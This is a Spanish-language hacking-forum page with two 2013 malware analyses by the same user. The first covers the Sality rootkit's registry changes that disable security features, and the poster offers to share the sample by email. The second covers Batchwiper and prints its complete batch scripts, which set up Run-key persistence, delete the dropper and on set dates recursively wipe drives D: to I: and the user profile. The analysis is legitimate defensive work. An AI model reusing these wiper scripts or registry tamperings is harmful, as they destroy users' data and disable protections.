elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


  Mostrar Mensajes
Páginas: 1 [2]
11  Seguridad Informática / Análisis y Diseño de Malware / Re: Rootkit Sality en: 25 Enero 2013, 19:49 pm
Gracias por los comentarios ;)
12  Seguridad Informática / Análisis y Diseño de Malware / Rootkit Sality en: 19 Enero 2013, 00:25 am
Hola a todos

Encontre una nueva version de este virus, si alguien necesita el archivo por favor enviar un correo.

Descripcion
El virus Sality ha evolucionado desde el año 2003, es un malware que infecta los archivos del sistema y se replica a través de la red, uniendo la maquina afectada a una red peer-to-peer la cual es usada para distribuir más contenido malicioso y programas usados para el envío de spam, robo de información privada, infectar servidores web o para realizar tareas de computo distribuido como el Password Cracking. Además de estas características también bloquea el acceso de algunos antivirus a los servidores de actualización por medio del filtrado IP.

Analisis
Al ejecutar el archivo se obtiene un mensaje que demuestra que el virus esta empaquetado con el software Themida; el cual es útil para impedir el análisis de ingeniería inversa. Realiza importantes cambios en el registro del sistema para disminuir los niveles de seguridad que existan en el mismo: Cambios como deshabilitar el Firewall, el antivirus, el sistema de actualizaciones de Windows, el UAC entre otros.

Código:
HKLM\SYSTEM\CurrentControlSet\Services\amsint32\Type: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\amsint32\Start: 0x00000003
HKLM\SYSTEM\CurrentControlSet\Services\amsint32\ErrorControl: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\amsint32\ImagePath: "\??\C:\WINDOWS\system32\drivers\kroir.sys"
HKLM\SYSTEM\CurrentControlSet\Services\amsint32\DisplayName: "amsint32"

HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_AMSINT32\0000\Control\ActiveService: "amsint32"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_AMSINT32\0000\Service: "amsint32"

HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_IPFILTERDRIVER\0000\Control\ActiveService: "IpFilterDriver"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_IPFILTERDRIVER\0000\Service: "IpFilterDriver"

HKLM\SOFTWARE\Microsoft\Security Center\UacDisableNotify: 0x00000001
HKLM\SOFTWARE\Microsoft\Security Center\Svc\AntiVirusOverride: 0x00000001
HKLM\SOFTWARE\Microsoft\Security Center\Svc\AntiVirusDisableNotify: 0x00000001
HKLM\SOFTWARE\Microsoft\Security Center\Svc\FirewallDisableNotify: 0x00000001
HKLM\SOFTWARE\Microsoft\Security Center\Svc\FirewallOverride: 0x00000001
HKLM\SOFTWARE\Microsoft\Security Center\Svc\UpdatesDisableNotify: 0x00000001
HKLM\SOFTWARE\Microsoft\Security Center\Svc\UacDisableNotify: 0x00000001
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\EnableLUA: 0x00000000

 


Como se puede ver en las llaves de registro también se instala así mismo como un servicio con el nombre amsint32 el cual a su vez extrae y ejecuta un driver (rootkit) en el Kernel que nos es posible identificar debido a que está oculto.






Para encontrar el driver fue necesario conectar un debugger al Kernel del sistema operativo y revisar la lista de módulos en ejecución. Una vez que está identificado el nombre del driver y del servicio (device) es posible encontrar la posición de memoria donde se encuentra ubicado y posteriormente revisar su estructura.





Despues de revisar el codigo se encontro una funcion en la posicion de memoria (0xf7bcab50), al revisar dicho sector se encontraron los strings de los antivirus a los cuales se les impide realizar conexiones con sus servidores de actualización





Salu2
13  Seguridad Informática / Análisis y Diseño de Malware / Batchwiper en: 6 Enero 2013, 19:48 pm
Hola a todos de nuevo, primero que todo les deseo un feliz y muy prospero año 2013 ;-D

----

Una investigación realizada por el Maher Center en Irán identifico un tipo de malware que elimina la información de los discos duros. Al realizar un análisis del funcionamiento se encontró que el proceso de limpieza de los archivos se ejecuta en determinadas fechas del año. Aunque el diseño del mismo es muy sencillo (simples componentes batch ) funciona y limpia el contenido de las unidades del disco duro: D:, E:, F:, G:, H:, I:

Los componentes son:

Código:
GrooveMonitor.exe -  f3dd76477e16e26571f8c64a7fd4a9
juboot.exe -  fa0b300e671f73b3b0f7f415ccbe9d41
jucheck.exe - c4cd216112cbc5b8c046934843c579f6
SLEEP.EXE - ea7ed6b50a9f7b31caeea372a327bd37
WmiPrv.exe - b7117b5d8281acd56648c9d08fadf630

Al ejecutar el Dropper GrooveMonitor.exe este extrae los componentes juboot.exe y jucheck.exe los cuales están comprimidos con UPX 3.03, al descomprimirlos se encontraron los siguientes scripts:

juboot.exe

Código
  1. @echo off & setlocal
  2. sleep for 2
  3. REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v jucheck.exe /t REG_SZ /d "%systemroot%\system32\jucheck.exe" /f
  4.  
  5. start "" /D"%systemroot%\system32\" "jucheck.exe"
  6.  


jucheck.exe

Código
  1. @echo off & setlocal
  2.  
  3. sleep for 2
  4. del "%systemroot%\system32\juboot.exe" /q /s /f
  5. del "%userprofile%\Start Menu\Programs\Startup\GrooveMonitor.exe" /q /s /f
  6. del "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\GrooveMonitor.exe" /q /s /f
  7.  
  8. :loop
  9. if "%date%"=="Mon 12/10/2012" goto yes
  10. if "%date%"=="Tue 12/11/2012" goto yes
  11. if "%date%"=="Wed 12/12/2012" goto yes
  12.  
  13. if "%date%"=="Mon 01/21/2013" goto yes
  14. if "%date%"=="Tue 01/22/2013" goto yes
  15. if "%date%"=="Wed 01/23/2013" goto yes
  16.  
  17. if "%date%"=="Mon 05/06/2013" goto yes
  18. if "%date%"=="Tue 05/07/2013" goto yes
  19. if "%date%"=="Wed 05/08/2013" goto yes
  20.  
  21. if "%date%"=="Mon 07/22/2013" goto yes
  22. if "%date%"=="Tue 07/23/2013" goto yes
  23. if "%date%"=="Wed 07/24/2013" goto yes
  24.  
  25. if "%date%"=="Mon 11/11/2013" goto yes
  26. if "%date%"=="Tue 11/12/2013" goto yes
  27. if "%date%"=="Wed 11/13/2013" goto yes
  28.  
  29. if "%date%"=="Mon 02/03/2014" goto yes
  30. if "%date%"=="Tue 02/04/2014" goto yes
  31. if "%date%"=="Wed 02/05/2014" goto yes
  32.  
  33. if "%date%"=="Mon 05/05/2014" goto yes
  34. if "%date%"=="Tue 05/06/2014" goto yes
  35. if "%date%"=="Wed 05/07/2014" goto yes
  36.  
  37. if "%date%"=="Mon 08/11/2014" goto yes
  38. if "%date%"=="Tue 08/12/2014" goto yes
  39. if "%date%"=="Wed 08/13/2014" goto yes
  40.  
  41. if "%date%"=="Mon 02/02/2015" goto yes
  42. if "%date%"=="Tue 02/03/2015" goto yes
  43. if "%date%"=="Wed 02/04/2015" goto yes
  44.  
  45. goto no
  46.  
  47. :yes
  48.  
  49. sleep for 3000
  50. IF EXIST d:\ del "d:\*.*" /q /s /f
  51. IF EXIST d:\ Chkdsk d:
  52. IF EXIST e:\ del "e:\*.*" /q /s /f
  53. IF EXIST e:\ Chkdsk e:
  54. IF EXIST f:\ del "f:\*.*" /q /s /f
  55. IF EXIST f:\ Chkdsk f:
  56. IF EXIST g:\ del "g:\*.*" /q /s /f
  57. IF EXIST g:\ Chkdsk g:
  58. IF EXIST h:\ del "h:\*.*" /q /s /f
  59. IF EXIST h:\ Chkdsk h:
  60. IF EXIST i:\ del "i:\*.*" /q /s /f
  61. IF EXIST i:\ Chkdsk i:
  62.  
  63. del "%userprofile%\*.*" /q /s /f
  64. \\start calc
  66. :no
  67. sleep for 3000
  68. goto loop
  69.  
  70.  

Modificaciones en el registro de Windows
Código:
----------------------------------
Values added:8
----------------------------------
HKU\S-1-5-21-73586283-616249376-1177238915-500\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\qbphzragbf\Ongpujvcre\TebbirZbavgbe.rkr: 01 00 00 00 06 00 00 00 F0 B9 E5 23 27 EC CD 01
HKU\S-1-5-21-73586283-616249376-1177238915-500\Software\Microsoft\Windows\CurrentVersion\Run\jucheck.exe: "C:\WINDOWS\system32\jucheck.exe"
HKU\S-1-5-21-73586283-616249376-1177238915-500\Software\Microsoft\Windows\ShellNoRoam\MUICache\@shell32.dll,-31275: "Esta sección muestra el tamaño, tipo de archivo y otra información acerca del elemento seleccionado."
HKU\S-1-5-21-73586283-616249376-1177238915-500\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\documentos\Batchwiper\GrooveMonitor.exe: "GrooveMonitor"
HKU\S-1-5-21-73586283-616249376-1177238915-500\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\WINDOWS\system32\juboot.exe: "Java(TM) Update Checker"
HKU\S-1-5-21-73586283-616249376-1177238915-500\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\Administrador\Configuración local\temp\1.tmp\juboot.bat: "juboot"
HKU\S-1-5-21-73586283-616249376-1177238915-500\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\Administrador\Configuración local\temp\4.tmp\jucheck.bat: "jucheck"
HKU\S-1-5-21-73586283-616249376-1177238915-500\Software\WinRAR SFX\C%%WINDOWS%system32%: "C:\WINDOWS\system32\"

 

Enlaces

http://www.certcc.ir/index.php?name=news&file=article&sid=2293


Páginas: 1 [2]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines